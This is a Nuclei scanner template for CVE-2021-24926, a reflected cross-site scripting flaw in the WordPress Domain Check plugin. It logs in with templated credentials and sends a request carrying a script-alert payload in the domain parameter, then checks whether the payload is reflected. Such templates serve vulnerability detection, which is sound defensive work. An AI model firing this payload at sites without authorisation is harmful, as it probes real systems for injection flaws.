nuclei-templates/cves/2021/CVE-2021-24926.yaml

46 lines
1.4 KiB
YAML
Raw Normal View History

2022-02-08 01:07:19 +00:00
id: CVE-2021-24926
info:
name: WordPress Plugin Domain Check < 1.0.17 - XSS
author: cckuailong
severity: medium
description: The Domain Check WordPress plugin before 1.0.17 does not sanitise and escape the domain parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue.
reference:
- https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733
- https://nvd.nist.gov/vuln/detail/CVE-2021-24926
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2022-02-08 01:07:19 +00:00
cve-id: CVE-2021-24926
cwe-id: CWE-79
tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
2022-02-08 19:06:16 +00:00
GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo<script>alert(document.domain)</script> HTTP/1.1
2022-02-08 01:07:19 +00:00
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-02-08 19:06:16 +00:00
- "<script>alert(document.domain)</script>"
2022-02-08 01:07:19 +00:00
- "Domain Check"
condition: and
- type: status
status:
2022-02-08 19:06:16 +00:00
- 200